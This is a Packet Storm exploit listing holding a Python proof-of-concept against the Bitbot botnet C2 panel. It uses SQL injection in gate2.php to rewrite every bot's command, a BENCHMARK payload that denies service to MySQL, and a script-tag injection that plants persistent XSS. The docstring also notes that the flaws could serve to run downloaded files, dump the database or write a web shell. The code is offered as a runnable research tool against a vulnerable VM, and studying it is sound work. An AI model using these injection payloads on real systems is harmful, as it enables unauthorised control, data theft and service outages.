what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Bitbot C2 Panel Cross Site Scripting / SQL Injection

Bitbot C2 Panel Cross Site Scripting / SQL Injection
Posted Aug 21, 2013
Authored by bwall

Bitbot C2 Panel suffers from cross site scripting and remote SQL injection vulnerabilities in gate2.php.

tags | exploit, remote, php, vulnerability, xss, sql injection
SHA-256 | 9acd6e911b5c392e36f1f1742b3974de1315faa9855834c5051c0afe4c08ea43

Bitbot C2 Panel Cross Site Scripting / SQL Injection

Change Mirror Download
# Exploit Title: Bitbot C2 Panel gate2.php SQLi + XSS
# Date: 08/19/2013
# Exploit Author: Brian Wallace (bwall aka @botnet_hunter)
# Software Link: https://sourceforge.net/p/flippingbitbot/wiki/Home/ (Vulnerable Virtual Machine including Bitbot)
# Tested on: Debian/Ubuntu
from StringIO import StringIO
import datetime
import urllib
import pycurl
import time

'''
Proof of concepts for the base attacks against the Bitbot panel.
By: Brian Wallace (bwall) @botnet_hunter

You can test these against the Vulnerable Virtual Machine challenge featuring
Bitbot at https://sourceforge.net/p/flippingbitbot/wiki/Home/ and
read details about more elaborate attacks against Bitbot at
http://cylance.com/techblog/A-Study-in-Bots-Bitbot.shtml

"drop" - Sets the command on all the bots to uninstall themselves, a modified
version could be used to get the bots to download and execute a file.

"xss" - Injects a fake bot which causes a persistent XSS in the bot panel, this
attack can be used to get information about the botter, or used to change
configuration values, such as which mining pool the bots are sending to. There
is very limited room for the XSS. Since very few of the values go through any
sanitization, it would be possible to implement the attack across multiple
parameters.

"dos" - While this attack implements a denial of service attack, it also shows
a simpler SQLi vulnerability than the one used to inject commands into the
bots. This one could be used to potentially dump the database, write a web
shell and read files from the host. I'll leave that to your imagination. The
implemented attack will DoS the MySQL server, and if repeated, eventually it
can DoS the Apache server if a max instance count is set (default configuration
will take only 150 to lock bots/botters out of Apache). The current version is a
blocking call.
'''


def Log(message):
t = time.time()
ts = datetime.datetime.fromtimestamp(t).strftime('%Y-%m-%d %H:%M:%S')
print ">>>> %(message)s" % {"message": message}


def drop(logger, botpanel, command):
params = urllib.urlencode({"connection": 0,
"hwid": "not the right bot' OR `cmd`!='" + command +
"' LIMIT 1-- -",
"btc": "0',`cmd`='" + command})
query = "/gate2.php?" + params
logger("Initiating change command on all bots process")
logger("Using `%(query)s` to modify the command of each bot" % {
'query': botpanel + query})
count = 0
while True:
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, botpanel + query)
c.setopt(c.WRITEFUNCTION, storage.write)
c.perform()
c.close()
data = storage.getvalue()
if data == "":
logger("%(count)d bots set to be removed" % {'count': count})
break
count += 1


def dos(logger, botpanel, command):
params = urllib.urlencode({"connection": 0,
"hwid": command})
query = "/gate2.php?" + params
logger("Initiating denial of service attack on panel")
logger("Using `%(query)s` to DoS the panel" % {
'query': botpanel + query})
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, botpanel + query)
c.setopt(c.WRITEFUNCTION, storage.write)
c.perform()
c.close()
logger("DoS query has been set")


def xss(logger, botpanel, command):
params = urllib.urlencode({"connection": 0,
"hwid": "007",
"version": 'pth',
"country": 'RUS',
"windows": 'Windows' + command,
"sysinfo": 'False Flag',
"btc": 'all'})
query = "/gate2.php?" + params
logger("Initiating fake bot for XSS process")
logger("Using `%(query)s` to inject a fake bot to poison the panel" % {
'query': botpanel + query})
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, botpanel + query)
c.setopt(c.WRITEFUNCTION, storage.write)
c.perform()
c.close()
logger("Persistent XSS has been set")


def Menu(botpanel):
Log("Commands:")
Log("xss: Persistent XSS PoC")
Log("drop: SQLi to set the command for all bots")
Log("dos: Simple SQLi implementation to DoS the MySQL server")
Log("quit: Exit all threads and quit")

command = raw_input("> ")
if command == "drop":
drop(Log, botpanel, "REMOVE")

if command == "xss":
xss(Log, botpanel, "<script>alert(1);</script>")

if command == "dos":
dos(Log, botpanel, "1' UNION ALL SELECT 1,1,1,1,1,1,BENCHMARK(100000" +
"00000000,MD5(REPEAT('a',100000000000000000000000))),1,1,1,1,'1")

if command == "quit":
Quit()
return False
return True

if __name__ == "__main__":
botpanel = "http://localhost:8080"
Log("Using bitbot panel at " + botpanel)
Log("Initializing")

while Menu(botpanel):
pass

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close